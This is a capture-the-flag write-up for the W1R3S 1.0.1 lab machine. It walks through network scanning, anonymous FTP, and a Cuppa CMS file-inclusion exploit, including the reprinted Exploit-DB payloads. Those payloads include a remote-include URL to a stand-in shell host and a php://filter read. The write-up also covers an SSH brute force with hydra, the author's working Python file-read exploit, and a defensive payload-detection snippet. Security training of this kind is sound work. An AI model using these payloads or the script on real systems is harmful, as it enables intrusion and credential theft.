
W1R3S: 1.0.1

About the Machine

Description:
You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).

Difficulty to get a low privileged shell: Beginner/Intermediate

Difficulty to get privilege escalation: Beginner/Intermediate

About: This is a vulnerable Ubuntu box giving you somewhat of a real world scenario and reminds me of the OSCP labs.

If you need any hints, pointers or have questions feel free to email me: specterinthewires at gmail dot com

Virtual Machine: VMware Workstation

Vulnhub Page:
https://www.vulnhub.com/entry/w1r3s-101,220/

Download Page:
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

Walkthrough

Let's start by locating the machine on the network.

┌──(root💀kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.2 00:50:56:f3:da:b0   VMware, Inc.
192.168.6.1 00:50:56:c0:00:08   VMware, Inc.
192.168.6.135   00:0c:29:6a:49:14   VMware, Inc.
192.168.6.254   00:50:56:e2:58:34   VMware, Inc.

35 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 4 responded

Let's continue with an nmap scan.

[*] Scan: 187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-10 21:33 EDT
Nmap scan report for W1R3S.inc (192.168.6.135)
Host is up (0.00044s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.6.132
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
|   256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_  256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:6A:49:14 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms W1R3S.inc (192.168.6.135)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.85 seconds

FTP allowed anonymous login. I grabbed the files from there, but they were not much help.

┌──(root💀kali)-[~/oscp/w1r3s]
└─# ftp 192.168.6.135 
Connected to 192.168.6.135.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.6.135:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.
ftp> cd content
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt
-rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt
-rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt
226 Directory send OK.
ftp> get 01.txt
local: 01.txt remote: 01.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for 01.txt (29 bytes).
226 Transfer complete.
29 bytes received in 0.00 secs (11.7903 kB/s)
ftp> get 02.txt
local: 02.txt remote: 02.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for 02.txt (165 bytes).
226 Transfer complete.
165 bytes received in 0.00 secs (69.5437 kB/s)
ftp> get 03.txt
local: 03.txt remote: 03.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for 03.txt (582 bytes).
226 Transfer complete.
582 bytes received in 0.00 secs (301.3570 kB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.
ftp> cd docs
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           138 Jan 23  2018 worktodo.txt
226 Directory send OK.
ftp> get worktodo.txt
local: worktodo.txt remote: worktodo.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
226 Transfer complete.
138 bytes received in 0.00 secs (74.2101 kB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.
ftp> cd new-employees
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           155 Jan 28  2018 employee-names.txt
226 Directory send OK.
ftp> get employee-names.txt
local: employee-names.txt remote: employee-names.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
226 Transfer complete.
155 bytes received in 0.00 secs (809.4502 kB/s)
ftp> exit
221 Goodbye.

I tried to extract some usernames from the files I had downloaded, and afterwards tried brute-forcing SSH with them, but I was not successful.

┌──(root💀kali)-[~/oscp/w1r3s]
└─# ls
01.txt  02.txt  03.txt  employee-names.txt  worktodo.txt

┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat 01.txt             
New FTP Server For W1R3S.inc

┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat 02.txt 
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################

┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat 03.txt 
___________.__              __      __  ______________________   _________    .__               
\__    ___/|  |__   ____   /  \    /  \/_   \______   \_____  \ /   _____/    |__| ____   ____  
  |    |   |  |  \_/ __ \  \   \/\/   / |   ||       _/ _(__  < \_____  \     |  |/    \_/ ___\ 
  |    |   |   Y  \  ___/   \        /  |   ||    |   \/       \/        \    |  |   |  \  \___ 
  |____|   |___|  /\___  >   \__/\  /   |___||____|_  /______  /_______  / /\ |__|___|  /\___  >
                \/     \/         \/                \/       \/        \/  \/         \/     \/ 

┌──(root💀kali)-[~/oscp/w1r3s]
└─# ls         
01.txt  02.txt  03.txt  employee-names.txt  worktodo.txt

┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat employee-names.txt 
The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat worktodo.txt      
    ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

┌──(root💀kali)-[~/oscp/w1r3s]
└─# touch users    

┌──(root💀kali)-[~/oscp/w1r3s]
└─# echo "naomi\nhector\njoseph\nalbert\ngina\nrico" >> users

┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat users       
naomi
hector
joseph
albert
gina
rico

When I went to port 80, I did directory enumeration and saw a running application.

┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# gobuster dir --url http://192.168.6.135 --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt  --no-error | tee 1

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.6.135
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,rar,7z,php,bak,txt,zip,sql,conf,php5,sh,bash,cap,pcap
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/07/10 18:38:47 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.135/icons/               (Status: 403) [Size: 294]
http://192.168.6.135/index.html           (Status: 200) [Size: 11321]
http://192.168.6.135/javascript/          (Status: 403) [Size: 299]  
http://192.168.6.135/administrator/       (Status: 200) [Size: 4322] 
http://192.168.6.135/server-status/       (Status: 403) [Size: 302]  
Progress: 2758095 / 19107510 (14.43%)                               ^C

┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# gobuster dir --url http://192.168.6.135/administrator --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt  --no-error | tee 2

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.6.135/administrator
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip,7z,conf,bash,bak,php,html,sql,txt,rar,php5,sh,cap,pcap
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/07/10 18:45:38 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.135/administrator/media/               (Status: 200) [Size: 2624]
http://192.168.6.135/administrator/templates/           (Status: 200) [Size: 31]  
http://192.168.6.135/administrator/index.php            (Status: 200) [Size: 4322]
http://192.168.6.135/administrator/alerts/              (Status: 200) [Size: 31]  
http://192.168.6.135/administrator/language/            (Status: 200) [Size: 1160]
http://192.168.6.135/administrator/js/                  (Status: 200) [Size: 31]  
http://192.168.6.135/administrator/components/          (Status: 200) [Size: 31]  
http://192.168.6.135/administrator/api/                 (Status: 200) [Size: 62]  
http://192.168.6.135/administrator/classes/             (Status: 200) [Size: 31]  
http://192.168.6.135/administrator/extensions/          (Status: 200) [Size: 31]  
http://192.168.6.135/administrator/robots.txt           (Status: 200) [Size: 26]  
http://192.168.6.135/administrator/installation/        (Status: 200) [Size: 4322]
http://192.168.6.135/administrator/Configuration.php    (Status: 200) [Size: 0]   
^C

There was an Exploit-DB entry written for the running application (Cuppa CMS).

┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# searchsploit cuppa cms                          
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                             | php/webapps/25971.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# cd ..                  

┌──(root💀kali)-[~/oscp/w1r3s]
└─# cp $(locate php/webapps/25971.txt) .                              

┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat 25971.txt                       
# Exploit Title   : Cuppa CMS File Inclusion
# Date            : 4 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version         : Beta
# Tested on       : Window and Linux

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /          
  / XXXXXX /
 (________(            
  `------'

####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22: 
        <
-----------------------------------------------------------------------------

#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream 

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Base64 Encode Output:

Base64 Decode Output:
-----------------------------------------------------------------------------
<?php 
    class Configuration{
        public $host = "localhost";
        public $db = "cuppa";
        public $user = "root";
        public $password = "Db@dmin";
        public $table_prefix = "cu_";
        public $administrator_template = "default";
        public $list_limit = 25;
        public $token = "OBqIPqlFWf3X";
        public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
        public $upload_default_path = "media/uploadsFiles";
        public $maximum_file_size = "5242880";
        public $secure_login = 0;
        public $secure_login_value = "";
        public $secure_login_redirect = "";
    } 
?>
-----------------------------------------------------------------------------

Able to read sensitive information via File Inclusion (PHP Stream)

################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 
################################################################################################################   

The problematic point is this: when I tried the exploit the way the entry describes it, I could not get it to work. A GET request is expected, but we can manipulate it with a POST request instead. The POST request I sent is given below.

POST /administrator/alerts/alertConfigField.php HTTP/1.1
Host: 192.168.6.135
Content-Type: application/x-www-form-urlencoded 
Content-Length: 121

urlConfig=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

HTTP/1.1 200 OK
Date: Sun, 11 Jul 2021 00:32:58 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: country=us; path=/
Set-Cookie: language=en; path=/
Set-Cookie: PHPSESSID=tl8pvlp28e5niha6si2nvrlu57; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4347
Content-Type: text/html; charset=UTF-8

<style>
    .new_content{
        position: fixed;
    }
    .alert_config_field{
        font-size:12px;
        background:#FFF;
        position:relative;
        border-radius: 3px;
        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
        overflow:hidden;
        position:fixed;
        top:50%;
        left:50%;
        width:600px;
        height:440px;
        margin-left:-300px;
        margin-top:-220px;
    }
    .alert_config_top{
        position: relative;
        margin: 2px;
        margin-bottom: 0px;
        border: 1px solid #D2D2D2;
        background: #4489F8;
        overflow: auto;
        color:#FFF;
        font-size: 13px;
        padding: 7px 5px;
        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
    }
    .description_alert{
        position:relative;
        font-size:12px;
        text-shadow:0 1px #FFFFFF;
        font-weight: normal;
        padding: 5px 0px 5px 0px;
    }
    .btnClose_alert{
        position:absolute;
        top: 4px; right: 2px;
        width:22px;
        height:22px;
        cursor:pointer;
        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
        background-position: center;
        background-size: 13px;
    }
    .content_alert_config{
        position:relative;
        clear:both;
        margin: 2px;
        margin-top: 0px;
        height: 401px;
        padding: 10px;
        overflow: auto;
    }
</style>
<script>
    function CloseDefaultAlert(){
        cuppa.setContent({'load':false, duration:0.2});
        cuppa.blockade({'load':false, duration:0.2, delay:0.1});
    }
</script>
<div class="alert_config_field" id="alert">
    <div class="alert_config_top">
        <strong>Configuration</strong>:         <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
    </div>
    <div id="content_alert_config" class="content_alert_config">
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
    </div>
</div>

From the response we can successfully obtain the w1r3s user. To make things easier, I wrote a Python script for this and submitted it to Exploit-DB.
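The check below is an added example (not the author's script and not Cuppa CMS code) covering both the fully percent-encoded POST payload above and the php://filter variant from the Exploit-DB entry: it decodes the urlConfig value once, as PHP does, classifies it as a stream wrapper, absolute path or traversal, and shows the base-directory containment check that the vulnerable include lacks. The sample bodies are constructed, and both query string and body are inspected because PHP's $_REQUEST merges them, which is why the POST variant worked where the GET form did not.

```python
import posixpath
import urllib.parse
from typing import Optional

# Constructed sample bodies, modelled on the payloads seen in this walkthrough:
# the hex-encoded traversal sent by hand, the script's "../"*N prefix, and the
# php://filter wrapper from the Exploit-DB entry.
SAMPLES = {
    "encoded_traversal": "urlConfig=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64",
    "script_traversal": "urlConfig=..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd",
    "php_filter": "urlConfig=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D..%2FConfiguration.php",
    "benign": "urlConfig=fields%2Fdefault.php",
}

# Stream wrappers that turn a file include into remote or filtered inclusion.
STREAM_WRAPPERS = ("php://", "http://", "https://", "ftp://", "data:", "expect://", "phar://")


def decode_param(form: str, name: str) -> Optional[str]:
    """Return the decoded value of `name` from a query string or form body.

    parse_qs decodes %XX sequences exactly once, like PHP, so %2e%2e%2f and
    ..%2F both become visible as '../' before any check runs.
    """
    params = urllib.parse.parse_qs(form, keep_blank_values=True)
    values = params.get(name)
    return values[0] if values else None


def classify(value: str) -> str:
    """Classify an include-path value as 'wrapper', 'absolute', 'traversal' or 'ok'."""
    if value.lower().startswith(STREAM_WRAPPERS):
        return "wrapper"
    if value.startswith("/"):
        return "absolute"
    # normpath collapses "a/../b" but keeps a leading "..", so any ".." segment
    # left after normalisation means the path escapes its starting directory.
    segments = posixpath.normpath(value).split("/")
    if ".." in segments:
        return "traversal"
    return "ok"


def classify_body(body: str) -> str:
    """Classify the urlConfig parameter of a POST body ('missing' if absent)."""
    value = decode_param(body, "urlConfig")
    return "missing" if value is None else classify(value)


def classify_request(query: str, body: str) -> str:
    """PHP reads urlConfig via $_REQUEST, which merges GET and POST, so a
    check that inspects only the query string misses the POST variant."""
    verdicts = []
    for source in (query, body):
        value = decode_param(source, "urlConfig")
        if value is not None:
            verdicts.append(classify(value))
    if not verdicts:
        return "missing"
    bad = [v for v in verdicts if v != "ok"]
    return bad[0] if bad else "ok"


def resolve_within(base: str, requested: str) -> Optional[str]:
    """Mitigation side: resolve `requested` under `base` and refuse anything
    that does not stay inside it. This is the containment check the
    vulnerable include(...) lacks; returns the safe path or None."""
    if classify(requested) != "ok":
        return None
    base_norm = posixpath.normpath(base)
    target = posixpath.normpath(posixpath.join(base_norm, requested))
    if target != base_norm and not target.startswith(base_norm + "/"):
        return None
    return target


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:>18}: {classify_body(body)}")
    print(resolve_within("/var/www/administrator/alerts", "fields/default.php"))
    print(resolve_within("/var/www/administrator/alerts", "../Configuration.php"))
```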

After that I launched another attack with hydra.

┌──(root💀kali)-[~/oscp/w1r3s]
└─# hydra -L users -P /usr/share/wordlists/rockyou.txt ssh://192.168.6.135
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-10 20:01:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.6.135:22/
[22][ssh] host: 192.168.6.135   login: w1r3s   password: computer
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-10 20:02:32

Now we can get in.

└─# ssh w1r3s@192.168.6.135
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.6.135's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

644 packages can be updated.
490 updates are security updates.

New release '18.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

.....You made it huh?....
Last login: Sat Jul 10 17:41:48 2021 from 192.168.6.132
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
w1r3s@W1R3S:~$ sudo su
[sudo] password for w1r3s: 
root@W1R3S:/home/w1r3s# cd /root
root@W1R3S:~# ls
flag.txt
root@W1R3S:~# cat flag.txt 
-----------------------------------------------------------------------------------------
   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
  / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
 | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
 | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
  \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 

-----------------------------------------------------------------------------------------

                          .-----------------TTTT_-----_______
                        /''''''''''(______O] ----------____  \______/]_
     __...---'"""\_ --''   Q                               ___________@
 |'''                   ._   _______________=---------"""""""
 |                ..--''|   l L |_l   |
 |          ..--''      .  /-___j '   '
 |    ..--''           /  ,       '   '
 |--''                /           `    \
                      L__'         \    -
                                    -    '-.
                                     '.    /
                                       '-./

----------------------------------------------------------------------------------------
  YOU HAVE COMPLETED THE
               __      __  ______________________   _________
              /  \    /  \/_   \______   \_____  \ /   _____/
              \   \/\/   / |   ||       _/ _(__  < \_____  \ 
               \        /  |   ||    |   \/       \/        \
                \__/\  /   |___||____|_  /______  /_______  /.INC
                     \/                \/       \/        \/        CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

----------------------------------------------------------------------------------------
root@W1R3S:~# 

The user is in the sudo group 🙂

Note: The exploit I wrote is given below.

┌──(root💀kali)-[~]
└─# cat Cuppa_CMS_File_Inclusion.py 
import sys
import urllib.parse

import requests
from bs4 import BeautifulSoup


def exploit(base_url):
    # Build the endpoint once; appending inside the loop grew the URL on every iteration.
    url = base_url + "alerts/alertConfigField.php"
    headers = {'Content-type': 'application/x-www-form-urlencoded'}
    while True:
        path = input("[*] Enter the full path of the file you want to read.\r\n>> ")
        # urlConfig is read via $_REQUEST, so the POST body works where the GET form did not.
        data = {'urlConfig': '../' * 10 + path}
        print("[*] Your payload:", urllib.parse.urlencode(data))
        r = requests.post(url, headers=headers, data=data)
        soup = BeautifulSoup(r.text, 'html.parser')
        content = soup.find(id="content_alert_config")
        if content is None:
            print("[!] No content_alert_config div in the response; check the URL.")
            continue
        print(content.text)


def main():
    ip = input("[*] Enter the target ip address.\r\n>> ")
    options = "1. http://{0}/\r\n2. http://{0}/administrator/\r\n3. http://{0}/cuppa/\r\n4. Other".format(ip)
    host = int(input("[*] The target address is similar to which of the following?\r\n{0}\r\n>> ".format(options)))
    switcher = {
        1: "http://{0}/".format(ip),
        2: "http://{0}/administrator/".format(ip),
        3: "http://{0}/cuppa/".format(ip),
    }
    if 0 < host < 4:
        exploit(switcher[host])
    elif host == 4:
        exploit(input("[*] Enter the URL\r\n>> "))
    else:
        print("[*] Incorrect operation")
        sys.exit()


if __name__ == "__main__":
    main()

"""
┌──(root💀kali)-[~]
└─# python3 Cuppa_CMS_File_Inclusion.py
[*] Enter the target ip adress.
>> 192.168.6.135
[*] The target address is similar to which of the following?
1. http://192.168.6.135/
2. http://192.168.6.135/administator/
3. http://192.168.6.135/cuppa/
4. Other
>> 2
[*] Enter the full path of the file you want to read.
>> /etc/passwd
[*] Your payload: urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd

        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
